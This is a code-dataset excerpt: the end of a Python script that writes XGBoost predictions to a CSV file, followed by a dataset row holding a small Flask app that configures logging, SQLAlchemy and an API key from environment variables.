ypred = predictions
with open('../validation/v_xgboost_word_tfidf_0-1.csv', 'w') as f1:
f1.write('qid,uid,label\n')
for i in range(0, len(ypred)):
f1.write(testData[i][0]+','+testData[i][1]+','+str(ypred[i])+'\n') |
okfn/hashtag-listener | app.py | Python | mit | 519 | 0.003854 | #!/usr/bin/env python
import logging
from os import environ
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
app = Flask(__name__)
stream_handler = logging.StreamHandler()
app.logger.setLevel(logging.DEBUG)
app.logger.addHandler(stream_handler)
app.config['SQLALCHEMY_DATABASE_URI'] = (environ.get('DATABASE_URL') or
'sqlite:////tmp/test.db')
app.config['APIKEY'] = envi | ron.get('APIKEY')
db = SQLAlchemy(app)
from models import * |
from controllers import *
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.